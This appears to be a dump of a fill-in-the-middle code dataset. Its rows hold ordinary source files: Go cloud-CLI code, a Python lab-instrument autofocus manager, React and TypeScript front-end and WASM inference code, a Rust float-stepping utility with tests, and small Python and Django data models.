file_name (string, 3–137 chars) | prefix (string, 0–918k chars) | suffix (string, 0–962k chars) | middle (string, 0–812k chars)
---|---|---|---|
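Each row below is one fill-in-the-middle (FIM) sample: a source file split into the text before a hole (prefix), the text after it (suffix), and the held-out span (middle). A minimal Python sketch, assuming plain string fields, of how a row reassembles into the original file:

def reconstruct(row):
    # The held-out middle slots back between prefix and suffix.
    return row['prefix'] + row['middle'] + row['suffix']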
archive_ostype.go | // Package ostype defines the OS types of SakuraCloud public archives
package ostype
//go:generate stringer -type=ArchiveOSTypes
// ArchiveOSTypes represents the OS type of a public archive
type ArchiveOSTypes int
const (
	// CentOS OS type: CentOS
	CentOS ArchiveOSTypes = iota
	// CentOS6 OS type: CentOS6
	CentOS6
	// Ubuntu OS type: Ubuntu
	Ubuntu
	// Debian OS type: Debian
	Debian
	// CoreOS OS type: CoreOS
	CoreOS
	// RancherOS OS type: RancherOS
	RancherOS
	// K3OS OS type: k3OS
	K3OS
	// Kusanagi OS type: Kusanagi (CentOS)
	Kusanagi
	// SophosUTM OS type: Sophos UTM
	SophosUTM
	// FreeBSD OS type: FreeBSD
	FreeBSD
	// Netwiser OS type: Netwiser Virtual Edition
	Netwiser
	// OPNsense OS type: OPNsense
	OPNsense
	// Windows2016 OS type: Windows Server 2016 Datacenter Edition
	Windows2016
	// Windows2016RDS OS type: Windows Server 2016 RDS
	Windows2016RDS
	// Windows2016RDSOffice OS type: Windows Server 2016 RDS (Office)
	Windows2016RDSOffice
	// Windows2016SQLServerWeb OS type: Windows Server 2016 SQLServer (Web)
	Windows2016SQLServerWeb
	// Windows2016SQLServerStandard OS type: Windows Server 2016 SQLServer 2016 (Standard)
	Windows2016SQLServerStandard
	// Windows2016SQLServer2017Standard OS type: Windows Server 2016 SQLServer 2017 (Standard)
	Windows2016SQLServer2017Standard
	// Windows2016SQLServerStandardAll OS type: Windows Server 2016 SQLServer (Standard) + RDS + Office
	Windows2016SQLServerStandardAll
	// Windows2016SQLServer2017StandardAll OS type: Windows Server 2016 SQLServer 2017 (Standard) + RDS + Office
	Windows2016SQLServer2017StandardAll
	// Windows2019 OS type: Windows Server 2019 Datacenter Edition
	Windows2019
	// Custom OS type: custom
	Custom
)
// OSTypeShortNames is the list of strings that can be used as an OSType
var OSTypeShortNames = []string{
"centos", "centos6", "ubuntu", "debian", "coreos",
"rancheros", "k3os", "kusanagi", "sophos-utm", "freebsd",
"netwiser", "opnsense",
"windows2016", "windows2016-rds", "windows2016-rds-office",
"windows2016-sql-web", "windows2016-sql-standard", "windows2016-sql-standard-all",
"windows2016-sql2017-standard", "windows2016-sql2017-standard-all",
"windows2019",
}
// IsWindows reports whether the OS type is a Windows variant
func (o ArchiveOSTypes) IsWindows() bool {
switch o {
case Windows2016, Windows2016RDS, Windows2016RDSOffice,
Windows2016SQLServerWeb, Windows2016SQLServerStandard, Windows2016SQLServerStandardAll,
Windows2016SQLServer2017Standard, Windows2016SQLServer2017StandardAll,
Windows2019:
return true
default:
return false
}
}
// IsSupportDiskEdit reports whether the disk modification feature is fully supported (returns false for Windows, which is only partially supported)
func (o ArchiveOSTypes) IsSupportDiskEdit() bool {
switch o {
case CentOS, CentOS6, Ubuntu, Debian, CoreOS, RancherOS, K3OS, Kusanagi, FreeBSD:
return true
default:
return false
}
}
// StrToOSType converts a string to an ArchiveOSTypes
func StrToOSType(osType string) ArchiveOSTypes {
switch osType {
case "centos":
return CentOS
case "centos6":
return CentOS6
case "ubuntu":
return Ubuntu
case "debian":
return Debian
case "coreos":
return CoreOS
case "rancheros":
return RancherOS
case "k3os":
		return K3OS
case "kusanagi":
return Kusanagi
case "sophos-utm":
return SophosUTM
case "freebsd":
return FreeBSD
case "netwiser":
return Netwiser
case "opnsense":
return OPNsense
case "windows2016":
return Windows2016
case "windows2016-rds":
return Windows2016RDS
case "windows2016-rds-office":
return Windows2016RDSOffice
case "windows2016-sql-web":
return Windows2016SQLServerWeb
case "windows2016-sql-standard":
return Windows2016SQLServerStandard
case "windows2016-sql2017-standard":
return Windows2016SQLServer2017Standard
case "windows2016-sql-standard-all":
return Windows2016SQLServerStandardAll
case "windows2016-sql2017-standard-all":
return Windows2016SQLServer2017StandardAll
case "windows2019":
return Windows2019
default:
return Custom
}
}
load_balancer_add_target.go | package cli
import (
"fmt"
"github.com/hetznercloud/hcloud-go/hcloud"
"github.com/spf13/cobra"
)
func newLoadBalancerAddTargetCommand(cli *CLI) *cobra.Command {
	cmd := &cobra.Command{
		Use:                   "add-target LOADBALANCER FLAGS",
		Short:                 "Add a target to a Load Balancer",
		Args:                  cobra.ExactArgs(1),
		TraverseChildren:      true,
		DisableFlagsInUseLine: true,
		PreRunE:               cli.ensureToken,
		RunE:                  cli.wrap(runLoadBalancerAddTarget),
	}
	cmd.Flags().String("server", "", "Name or ID of the server")
	cmd.Flag("server").Annotations = map[string][]string{
		cobra.BashCompCustom: {"__hcloud_server_names"},
	}
	cmd.Flags().Bool("use-private-ip", false, "Determine if the Load Balancer should connect to the target via the network")
	return cmd
}
func runLoadBalancerAddTarget(cli *CLI, cmd *cobra.Command, args []string) error {
serverIdOrName, _ := cmd.Flags().GetString("server")
idOrName := args[0]
usePrivateIP, _ := cmd.Flags().GetBool("use-private-ip")
loadBalancer, _, err := cli.Client().LoadBalancer.Get(cli.Context, idOrName)
if err != nil {
return err
}
if loadBalancer == nil {
return fmt.Errorf("Load Balancer not found: %s", idOrName)
}
var action *hcloud.Action
if serverIdOrName != "" {
server, _, err := cli.Client().Server.Get(cli.Context, serverIdOrName)
if err != nil {
return err
}
if server == nil {
return fmt.Errorf("server not found: %s", serverIdOrName)
}
action, _, err = cli.Client().LoadBalancer.AddServerTarget(cli.Context, loadBalancer, hcloud.LoadBalancerAddServerTargetOpts{
Server: server,
UsePrivateIP: hcloud.Bool(usePrivateIP),
})
if err != nil {
return err
}
} else {
return fmt.Errorf("specify one of server")
}
if err := cli.ActionProgress(cli.Context, action); err != nil {
return err
}
fmt.Printf("Target added to Load Balancer %d\n", loadBalancer.ID)
return nil
}
autofocus_manager.py | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =============enthought library imports=======================
from __future__ import absolute_import
from __future__ import print_function
import six.moves.cPickle as pickle
from traits.api import Bool, Any, Instance, Button, Property, Event, on_trait_change
from traitsui.api import View, Item, Handler, HGroup
# ============= standard library imports ========================
# from threading import Thread
from threading import Event as TEvent
from numpy import linspace, argmin, argmax, random, asarray
import time
import os
# ============= local library imports ==========================
from pychron.core.time_series.time_series import smooth
from pychron.image.cv_wrapper import grayspace, crop, get_focus_measure
# from pychron.image.cvwrapper import grayspace, get_focus_measure, crop, resize
from scipy.ndimage.measurements import variance
from scipy.ndimage.filters import generic_gradient_magnitude, sobel
from scipy.ndimage import sum as ndsum
from pychron.paths import paths
from pychron.managers.manager import Manager
from pychron.image.image import Image
# from pychron.machine_vision.focus_parameters import FocusParameters
# from pychron.image.image_editor import ImageEditor
from pychron.graph.graph import Graph
from pychron.mv.focus.focus_parameters import FocusParameters
from pychron.core.ui.image_editor import ImageEditor
from pychron.core.ui.gui import invoke_in_main_thread
from pychron.core.ui.thread import Thread
class ConfigureHandler(Handler):
def closed(self, info, isok):
if isok:
info.object.dump_parameters()
class AutoFocusManager(Manager):
"""
currently uses passive focus techniques
see
http://en.wikipedia.org/wiki/Autofocus
"""
video = Any
laser_manager = Any
stage_controller = Any
canvas = Any
parameters = Instance(FocusParameters)
configure_button = Button('configure')
autofocus_button = Event
autofocus_label = Property(depends_on='autofocusing')
autofocusing = Bool
# threading event for cancel signal
_evt_autofocusing = None
image = Instance(Image, ())
graph = None
def dump_parameters(self):
p = os.path.join(paths.hidden_dir, 'autofocus_configure')
self.info('dumping parameters to {}'.format(p))
with open(p, 'wb') as f:
pickle.dump(self.parameters, f)
def load_parameter(self):
p = os.path.join(paths.hidden_dir, 'autofocus_configure')
if os.path.isfile(p):
with open(p, 'rb') as f:
try:
params = pickle.load(f)
self.info('loading parameters from {}'.format(p))
if not isinstance(params, FocusParameters):
self.info('out of date parameters file. using default')
params = FocusParameters()
return params
except Exception as e:
print('autofocus load parameter', e)
return FocusParameters()
else:
return FocusParameters()
def passive_focus(self, block=False, **kw):
self._evt_autofocusing = TEvent()
self._evt_autofocusing.clear()
# manager = self.laser_manager
oper = self.parameters.operator
self.info('passive focus. operator = {}'.format(oper))
g = self.graph
if not g:
g = Graph(plotcontainer_dict=dict(padding=10),
window_x=0.70,
window_y=20,
window_width=325,
window_height=325,
window_title='Autofocus'
)
self.graph = g
g.clear()
g.new_plot(padding=[40, 10, 10, 40],
xtitle='Z (mm)',
ytitle='Focus Measure ({})'.format(oper)
)
g.new_series()
g.new_series()
invoke_in_main_thread(self._open_graph)
target = self._passive_focus
self._passive_focus_thread = Thread(name='autofocus', target=target,
args=(self._evt_autofocusing,
),
kwargs=kw
)
self._passive_focus_thread.start()
if block:
# while 1:
# if not self._passive_focus_thread.isRunning():
# break
# time.sleep(0.25)
self._passive_focus_thread.join()
def _open_graph(self):
ui = self.graph.edit_traits()
self.add_window(ui)
def stop_focus(self):
if self.stage_controller:
self.stage_controller.stop()
self.info('autofocusing stopped by user')
def _passive_focus(self, stop_signal, set_zoom=True):
'''
sweep z looking for max focus measure
FMgrad= roberts or sobel (sobel removes noise)
FMvar = intensity variance
'''
self.autofocusing = True
manager = self.laser_manager
fstart = self.parameters.fstart
fend = self.parameters.fend
step_scalar = self.parameters.step_scalar
zoom = self.parameters.zoom
operator = self.parameters.operator
steps = step_scalar * (max(fend, fstart) - min(fend, fstart)) + 1
prev_zoom = None
if set_zoom and \
manager is not None and \
zoom:
motor = manager.get_motor('zoom')
if motor:
prev_zoom = motor.data_position
self.info('setting zoom: {}'.format(zoom))
manager.set_motor('zoom', zoom, block=True)
time.sleep(1.5)
args = self._do_focusing(fstart, fend, steps, operator)
if manager is not None:
if prev_zoom is not None:
self.info('returning to previous zoom: {}'.format(prev_zoom))
manager.set_motor('zoom', prev_zoom, block=True)
if args:
mi, fmi, ma, fma = args
self.info('''passive focus results:Operator={}
ImageGradmin={} (z={})
ImageGradmax={}, (z={})'''.format(operator, mi, fmi, ma, fma))
focus_pos = fma
self.graph.add_vertical_rule(focus_pos)
self.graph.redraw()
# self.graph.add_vertical_rule(fma)
self.info('calculated focus z= {}'.format(focus_pos))
# if set_z:
controller = self.stage_controller
if controller is not None:
if not stop_signal.isSet():
controller.single_axis_move('z', focus_pos, block=True)
controller._z_position = focus_pos
controller.z_progress = focus_pos
self.autofocusing = False
def _cancel_sweep(self, vo):
if self._evt_autofocusing.isSet():
# return to original velocity
self.autofocusing = False
self._reset_velocity(vo)
return True
def _reset_velocity(self, vo):
if self.stage_controller:
pdict = dict(velocity=vo, key='z')
self.stage_controller.set_single_axis_motion_parameters(pdict=pdict)
def _do_focusing(self, start, end, steps, operator):
screen_roi = self._get_roi()
self._add_focus_area_rect(*screen_roi)
src = self._load_source()
src = asarray(src)
h, w, _d = src.shape
cx = w / 2.
cy = h / 2.
cw = self.parameters.crop_width
ch = self.parameters.crop_height
roi = cx, cy, cw, ch
'''
start the z in motion and take pictures as you go
query stage_controller to get current z
'''
self.info('focus sweep start={} end={}'.format(start, end))
# move to start position
controller = self.stage_controller
if controller:
vo = controller.axes['z'].velocity
if self._cancel_sweep(vo):
return
self.graph.set_x_limits(min(start, end), max(start, end), pad=2)
# sweep 1 and velocity 1
self._do_sweep(start, end, velocity=self.parameters.velocity_scalar1)
fms, focussteps = self._collect_focus_measures(operator, roi)
if not (fms and focussteps):
return
# reached end of sweep
# calculate a nominal focal point
args = self._calculate_nominal_focal_point(fms, focussteps)
if not args:
return
nfocal = args[3]
nwin = self.parameters.negative_window
pwin = self.parameters.positive_window
if self._cancel_sweep(vo):
return
nstart, nend = max(0, nfocal - nwin), nfocal + pwin
# mi = min(min(nstart, nend), min(start, end))
# ma = max(max(nstart, nend), max(start, end))
# self.graph.set_x_limits(mi, ma, pad=2)
time.sleep(1)
# do a slow tight sweep around the nominal focal point
self._do_sweep(nstart, nend, velocity=self.parameters.velocity_scalar2)
fms, focussteps = self._collect_focus_measures(operator, roi, series=1)
self._reset_velocity(vo)
else:
focussteps = linspace(0, 10, 11)
fms = -(focussteps - 5) ** 2 + 10 + random.random(11)
self.info('frames analyzed {}'.format(len(fms)))
# self.canvas.markupcontainer.pop('croprect')
return self._calculate_nominal_focal_point(fms, focussteps)
def _do_sweep(self, start, end, velocity=None):
controller = self.stage_controller
controller.single_axis_move('z', start, block=True)
# time.sleep(0.1)
# explicitly check for motion
# controller.block(axis='z')
if velocity:
vo = controller.axes['z'].velocity
controller.set_single_axis_motion_parameters(pdict=dict(velocity=vo * velocity,
key='z'))
self.info('starting sweep from {}'.format(controller.z_progress))
# pause before moving to end
time.sleep(0.25)
controller.single_axis_move('z', end, update=100, immediate=True)
def _collect_focus_measures(self, operator, roi, series=0):
controller = self.stage_controller
focussteps = []
fms = []
if controller.timer:
p = controller.timer.get_interval()
self.debug('controller timer period {}'.format(p))
pz = controller.z_progress
while 1:
src = self._load_source()
x = controller.z_progress
if x != pz:
y = self._calculate_focus_measure(src, operator, roi)
self.graph.add_datum((x, y), series=series)
focussteps.append(x)
fms.append(y)
pz = x
if not (controller.timer.isActive() and \
not self._evt_autofocusing.isSet()):
break
time.sleep(p)
self.debug('sweep finished')
return fms, focussteps
def _calculate_nominal_focal_point(self, fms, focussteps):
if fms:
sfms = smooth(fms)
if sfms is not None:
self.graph.new_series(focussteps, sfms)
self.graph.redraw()
fmi = focussteps[argmin(sfms)]
fma = focussteps[argmax(sfms)]
mi = min(sfms)
ma = max(sfms)
return mi, fmi, ma, fma
def _calculate_focus_measure(self, src, operator, roi):
'''
see
IMPLEMENTATION OF A PASSIVE AUTOMATIC FOCUSING ALGORITHM
FOR DIGITAL STILL CAMERA
DOI 10.1109/30.468047
and
http://cybertron.cg.tu-berlin.de/pdci10/frankencam/#autofocus
'''
# need to resize to 640,480. this is the space the roi is in
# s = resize(grayspace(pychron), 640, 480)
src = grayspace(src)
v = crop(src, *roi)
di = dict(var=lambda x:variance(x),
laplace=lambda x: get_focus_measure(x, 'laplace'),
sobel=lambda x: ndsum(generic_gradient_magnitude(x, sobel, mode='nearest'))
)
func = di[operator]
return func(v)
def image_view(self):
v = View(Item('image', show_label=False, editor=ImageEditor(),
width=640,
height=480,
style='custom'))
return v
def traits_view(self):
v = View(
HGroup(self._button_factory('autofocus_button', 'autofocus_label'),
Item('configure_button', show_label=False),
show_border=True,
label='Autofocus'
)
)
return v
def configure_view(self):
v = View(Item('parameters', style='custom', show_label=False),
handler=ConfigureHandler,
buttons=['OK', 'Cancel'],
kind='livemodal',
title='Configure Autofocus',
x=0.80,
y=0.05
)
return v
def _load_source(self):
src = self.video.get_frame()
return src
# if pychron:
# return Image.new_frame(pychron)
# self.image.load(pychron)
# return self.image.source_frame
def _get_roi(self):
w = self.parameters.crop_width
h = self.parameters.crop_height
cx, cy = self.canvas.get_center_rect_position(w, h)
# cw, ch = self.canvas.outer_bounds
# print w, h, cw, ch
# cx = cw / 2. - w / 2.
# cy = ch / 2. - h / 2.
# cx = (cw - w) / 2.
# cy = (ch - h) / 2.
# cx = (640 * self.canvas.scaling - w) / 2
# cy = (480 * self.canvas.scaling - h) / 2
roi = cx, cy, w, h
return roi
def _add_focus_area_rect(self, cx, cy, w, h):
# pl = self.canvas.padding_left
# pb = self.canvas.padding_bottom
self.canvas.remove_item('croprect')
self.canvas.add_markup_rect(cx, cy, w, h, identifier='croprect')
def _autofocus_button_fired(self):
if not self.autofocusing:
self.autofocusing = True
self.passive_focus()
else:
self.autofocusing = False
self._evt_autofocusing.set()
self.stop_focus()
def _configure_button_fired(self):
self._crop_rect_update()
self.edit_traits(view='configure_view', kind='livemodal')
self.canvas.remove_item('croprect')
# try:
# self.canvas.markupcontainer.pop('croprect')
# except KeyError:
# pass
@on_trait_change('parameters:[_crop_width,_crop_height]')
def _crop_rect_update(self):
roi = self._get_roi()
self._add_focus_area_rect(*roi)
def _get_autofocus_label(self):
        return 'Autofocus' if not self.autofocusing else 'Stop'
def _parameters_default(self):
return self.load_parameter()
def _autofocusing_changed(self, new):
if not new:
self.canvas.remove_item('croprect')
# ===============================================================================
# Deprecated
# ===============================================================================
# ============= EOF =====================================
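The operator dispatch in `_calculate_focus_measure` reduces a cropped grayscale frame to a single sharpness score. A minimal self-contained sketch of the same idea, assuming a NumPy grayscale array and substituting plain NumPy/SciPy for the pychron/OpenCV helpers:

import numpy as np
from scipy.ndimage import generic_gradient_magnitude, sobel

def focus_measure(gray: np.ndarray, operator: str = 'var') -> float:
    # Higher scores mean sharper focus; the sweep picks the z with the max score.
    if operator == 'var':
        return float(gray.var())  # FMvar: intensity variance
    if operator == 'sobel':
        # FMgrad: sum of Sobel gradient magnitudes
        return float(generic_gradient_magnitude(gray, sobel, mode='nearest').sum())
    raise ValueError('unknown operator: {}'.format(operator))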
book-detail.js | import React, { Component } from 'react';
import { connect } from 'react-redux';
class BookDetail extends Component {
render() {
if (!this.props.book) {
      return <div> Select a book to get started.</div>;
}
return (
<div>
<h3> Details for: </h3>
<div> {this.props.book.title}</div>
</div>
);
}
}
function mapStateToProps(state) {
return {
book: state.activeBook
};
}
export default connect(mapStateToProps)(BookDetail);
bit_pattern.rs | use std::ops::Deref;
#[derive(Copy, Clone, Debug, Default, PartialEq, PartialOrd)]
pub struct StepFloat(f32);
impl Deref for StepFloat {
type Target = f32;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl StepFloat {
pub fn new(val: f32) -> Self {
StepFloat(val)
}
pub fn increment(self) -> Self {
let value = self.0.to_bits();
let mantissa = value & 0b0_00000000_11111111111111111111111;
let incr = if mantissa == 0b0_00000000_11111111111111111111111 {
            let mut exponent = value & 0b0_11111111_00000000000000000000000;
            exponent >>= 23;
            exponent += 1;
            exponent <<= 23;
let mut value = value & 0b1_00000000_11111111111111111111111;
value |= exponent;
// reset mantissa
value & 0b1_11111111_00000000000000000000000
} else {
let mut mantissa = value & 0b0_00000000_11111111111111111111111;
mantissa += 1;
let value = value & 0b1_11111111_00000000000000000000000;
value | mantissa
};
Self(f32::from_bits(incr))
}
pub fn decrement(self) -> Self {
let value = self.0.to_bits();
let mantissa = value & 0b0_00000000_11111111111111111111111;
let decr = if mantissa == 0b0_00000000_00000000000000000000000 {
let mut exponent = value & 0b0_11111111_00000000000000000000000;
exponent >>= 23;
exponent -= 1;
exponent <<= 23;
let value = value & 0b1_00000000_11111111111111111111111;
let value = value | exponent;
// set mantissa
value | 0b0_00000000_11111111111111111111111
} else {
let mut mantissa = value & 0b0_00000000_11111111111111111111111;
mantissa -= 1;
let value = value & 0b1_11111111_00000000000000000000000;
value | mantissa
};
Self(f32::from_bits(decr))
}
}
#[cfg(test)]
mod test {
use crate::bit_pattern::StepFloat;
use proptest::prelude::*;
#[test]
fn increments_zero() {
let sf = StepFloat::new(0.0);
let sf = sf.increment();
let value = unsafe { std::mem::transmute::<f32, u32>(sf.0) };
assert_eq!(1, value);
let sf = sf.increment();
let value = unsafe { std::mem::transmute::<f32, u32>(sf.0) };
assert_eq!(2, value);
}
#[test]
fn increments_one() {
let sf = StepFloat::new(1.0);
let one = unsafe { std::mem::transmute::<f32, u32>(sf.0) };
assert_eq!(one, 0b00111111_10000000_00000000_00000000);
let sf = sf.increment();
let value = unsafe { std::mem::transmute::<f32, u32>(sf.0) };
assert_eq!(value, one + 1);
}
#[test]
fn test_incr_decr_noboundary() {
let initial = StepFloat::new(0.1);
let incr = initial.increment();
let original = incr.decrement();
assert_eq!(initial, original);
}
#[test]
fn test_incr_decr_boundary() {
let pattern: u32 = 0b0_00001111_11111111111111111111111;
let initial = StepFloat::new(unsafe { std::mem::transmute(pattern) });
let original = initial.clone().increment().decrement();
assert_eq!(initial, original);
}
proptest! {
#[test]
fn incr_decr_is_noop(p in any::<f32>()) {
let sf = StepFloat::new(p);
assert_eq!(sf, StepFloat::new(p).increment().decrement());
}
#[test]
fn incr_decr_n_times_is_noop(p in any::<f32>(), n in 0usize..1024) {
let mut sf = StepFloat::new(p);
for _ in 0..n {
sf = sf.increment();
}
for _ in 0..n {
sf = sf.decrement();
}
assert_eq!(sf, StepFloat::new(p));
}
}
}
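StepFloat's increment and decrement walk to the adjacent representable f32 by editing the bit pattern directly. A sketch of the same trick in Python, assuming finite, non-negative inputs (math.nextafter is the library way to do this):

import struct

def f32_increment(x: float) -> float:
    # Reinterpret the float32 as its raw 32-bit pattern and add one.
    (bits,) = struct.unpack('<I', struct.pack('<f', x))
    return struct.unpack('<f', struct.pack('<I', bits + 1))[0]

For non-negative finite values, adding 1 to the bit pattern carries from the mantissa into the exponent automatically, which is exactly the mantissa-overflow boundary case the Rust code above handles by hand.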
group.py | class Group:
"""
name: Name of group (String)
deposit: $ Amount required to book the group (Float)
type: Speedball, Recball, Rental (String)
players: ([Object])
paint_bags: list of paint the group has purchased ([Int])
transactions: ([Object])
"""
def __init__(self, name, deposit, type):
self.name = name
self.deposit = deposit
self.type = type
self.players = []
self.paint_bags = []
self.transactions = []
def get_name(self):
return self.name
def get_type(self):
return self.type
def number_of_players(self):
return len(self.players)
def total_spent(self):
total_spent_by_group = 0.0
for transaction in self.transactions:
total_spent_by_group += transaction.amount
return total_spent_by_group
def get_deposit(self):
return self.deposit
def grand_total(self):
return self.total_spent() + self.deposit
def check_if_players_paid(self):
if len(self.players) == 0:
return False
for player in self.players:
if not player.paid:
return False
return True
def number_players_paid(self):
players_who_paid = 0
for player in self.players:
if player.paid:
players_who_paid += 1
return players_who_paid
def total_bags_and_cases(self):
cases = sum(self.paint_bags) // 4
bags = sum(self.paint_bags) % 4
return bags, cases
    def get_players(self):
return self.players
def add_player(self, player):
self.players.append(player)
def get_transactions(self):
return self.transactions
def paint_length(self):
return len(self.paint_bags)
def delete_last_paint(self):
del self.paint_bags[-1]
class Player:
def __init__(self, name):
self.name = name
self.paid = False # 2
self.selected = False # 6
def change_select_status(self):
if not self.selected:
self.selected = True
else:
self.selected = False
def get_name(self):
return self.name
def mark_paid(self):
self.paid = True
def mark_unpaid(self):
self.paid = False
def did_pay(self):
return self.paid
def change_pay_status(self):
if self.paid:
self.paid = False
else:
self.paid = True
def is_selected(self):
return self.selected
def deselect(self):
self.selected = False
class Transaction:
def __init__(self, amount, type):
self.amount = amount
self.type = type
self.selected = False
def change_select_status(self):
if not self.selected:
self.selected = True
else:
self.selected = False
def get_type(self):
return self.type
def get_amount(self):
return self.amount
def is_selected(self):
        return self.selected
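A brief usage sketch (hypothetical values) showing how the paint tally rolls up, where four bags make a case:

group = Group('Walk-ons', deposit=50.0, type='Recball')
group.add_player(Player('Sam'))
group.paint_bags.extend([3, 2, 4])  # three purchases, 9 bags total
bags, cases = group.total_bags_and_cases()
assert (bags, cases) == (1, 2)  # 9 bags = 2 cases of 4, plus 1 loose bag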
backend.ts | /**
* @file webgl backend
* @author yueshuangyan
*/
import { PaddlejsBackend, env } from '@paddlejs/paddlejs-core';
import type OpExecutor from '@paddlejs/paddlejs-core/src/opFactory/opExecutor';
import { WasmMemoryType } from '@paddlejs/paddlejs-core/commons/interface';
import { RunnerConfig } from './types';
import { download, nchw2chwn, nhwc2chwn, nchw2nhwc, nhwc2nchw } from './utils';
import Wasm from './wasm';
export default class WasmBackend extends PaddlejsBackend {
wasm: Wasm;
    total: number; // total number of models
    cur: number; // index of the current model
modelConfigList: RunnerConfig[];
modelTimeList: number[];
constructor() {
super();
this.modelConfigList = [];
        this.total = -1; // number of models registered so far
        this.cur = -1; // which model is current
env.set('backend', 'wasm');
}
async init() {
        // multiple models load in parallel; the wasm module is initialized only once
await Promise.all([this.initForFirstTime(), this.initSubsequently()]);
}
async initForFirstTime() {
if (!this.wasm) {
const wasm = new Wasm();
this.wasm = wasm;
await wasm.load(WasmMemoryType.memory100);
}
}
async initSubsequently() {
let timer;
return new Promise(resolve => {
timer = setInterval(() => {
if (this.wasm.loaded) {
resolve(true);
clearInterval(timer);
};
}, 10);
});
}
initWasm(modelConfig?: RunnerConfig, weightMap?: OpExecutor[]): number {
this.total++;
const cur = this.total;
modelConfig.index = cur;
this.modelConfigList.push(modelConfig);
const modelInfo = this.genGraphContentStr(weightMap, modelConfig.dataLayout);
this.wasm.init(modelInfo, cur);
return cur;
}
async predict(imageData, index: number) {
if (imageData) {
            // write the imageData
this.wasm.wasmUtil.updateImage(index, imageData);
}
this.cur = index;
        // get the image data
this.wasm.runnerModule.run(index);
}
async read(fetchInfo) {
const index = fetchInfo.index;
const curModelConfig = this.modelConfigList[index];
const {
multiOutputs
} = curModelConfig;
let result = [];
if (multiOutputs) {
            // extract the data
for (const output of multiOutputs) {
const { name, shape } = output;
const data = this.readOpData(index, name);
const [W = 1, H = 1, C = 1, N = 1] = shape.reverse();
const nchwData = nhwc2nchw(data, [N, H, W, C]);
result.push(nchwData);
}
return result;
}
const { name, shape } = fetchInfo;
result = this.readOpData(index, name);
// convert to nchw
const [W = 1, H = 1, C = 1, N = 1] = shape.reverse();
return nhwc2nchw(result, [N, H, W, C]);
}
readOpData(modelIndex, name) {
const { getDataPtr, __newString, __getArray } = this.wasm.runnerModule;
const ptr = getDataPtr(modelIndex, __newString(name));
const [curPtr, total] = __getArray(ptr);
const data = this.wasm.wasmUtil.readXnn(Float32Array, total, curPtr);
return data;
}
downloadOpData(modelIndex, name) {
const data = this.readOpData(modelIndex, name);
const str = data.join(',');
download(str, str.length);
}
getExecuteTime(ptr) {
const list = new Float32Array(this.wasm.runnerModule.memory.buffer, ptr, 1);
const listLen = list.length;
const timeSum = list.reduce((acc, cur) => acc + cur);
const timeAvg = timeSum / listLen;
const text = document.createElement('div');
text.innerHTML = timeAvg + '';
// document.body.appendChild(text);
}
genGraphContentStr(weightMap, dataLayout) {
const isDataNhwc = dataLayout === 'nhwc';
const tensorOutMap = new Map();
const dataLenList = [];
const result = weightMap.filter(op => {
return op && op.opData && op.opData.tensorData;
}).map(op => {
const tensorData = op.opData.tensorData.map(tensor => {
const { name, tensorName, shape, total } = tensor || {};
const [w = 1, h = 1, c = 1, n = 1] = [...(tensor?.shape || [])].reverse();
let length_unformatted_shape = 4;
let ptr = 0;
if (tensor.data && tensor.data.length && tensorName !== 'image') {
let data = tensor.data = new Float32Array(Array.from(tensor.data, item => Number(item as string)));
dataLenList.push(total);
                    // write to memory
const opName = op.opData.name;
data = opName === 'conv2d_depthwise' && tensorName === 'filter'
? (isDataNhwc ? nhwc2chwn(data, [n, c, h, w]) : nchw2chwn(data, [n, c, h, w])) as Float32Array
: (isDataNhwc ? data : nchw2nhwc(data, [n, c, h, w])) as Float32Array;
ptr = this.wasm.wasmUtil.write(Float32Array, total, data);
length_unformatted_shape = op.opData.inputTensors.filter(
inputTensor => inputTensor.name === tensor.tensorName)[0].unformattedShapeLength;
}
else if (tensorName === 'out') {
tensorOutMap.set(name, 1);
length_unformatted_shape = op.opData.outputTensors.filter(
inputTensor => inputTensor.name === tensor.tensorName)[0].unformattedShapeLength;
}
else if (tensorOutMap.has(name)) {
length_unformatted_shape = op.opData.inputTensors.filter(
inputTensor => inputTensor.name === tensor.tensorName)[0].unformattedShapeLength;
}
const ptrStr = ptr !== undefined ? `##${ptr}` : '';
const runtime = tensor.runtime || 0;
return `${name}##${shape.join('#$')}##${tensorName}##${total}`
+ `##${length_unformatted_shape}##${runtime}${ptrStr}`;
});
const tensorDataStr = tensorData.join('#@');
const attrs = op.opData.processedAttrs;
const opName = op.opData.name;
if (opName === 'conv2d_depthwise') {
attrs.is_depthwise = 1;
op.opData.name = 'conv2d';
}
const attrsStr = Object.keys(attrs).map(key => {
const item = attrs[key];
const value = item instanceof Array ? item.join('#$') : item;
return `${key}:${value}`;
}).join('##');
return `${op.opData.name}#!${tensorDataStr}#!${attrsStr}`;
});
return ['no#' + result.join('#~'), dataLenList];
}
createProgram() {
        // initialization
}
runProgram() {
}
dispose() {
}
}
models.py | from django.db import models
class Category(models.Model):
name = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Categorias'
class Transactions(models.Model):
    date = models.DateField()
description = models.CharField(max_length=100)
value = models.DecimalField(max_digits=7, decimal_places=2)
observations = models.TextField(null=True, blank=True)
    category = models.ForeignKey(Category, on_delete=models.CASCADE)
def __str__(self):
return self.description
class Meta:
        verbose_name_plural = 'Transações'
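A minimal usage sketch of how the two models relate, assuming the app is installed and migrated:

from decimal import Decimal

cat = Category.objects.create(name='Food')
Transactions.objects.create(
    date='2021-05-01',
    description='Groceries',
    value=Decimal('42.50'),
    category=cat,
)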
angular-cookies.min.js | /*
AngularJS v1.2.13
(c) 2010-2014 Google, Inc. http://angularjs.org
License: MIT
*/
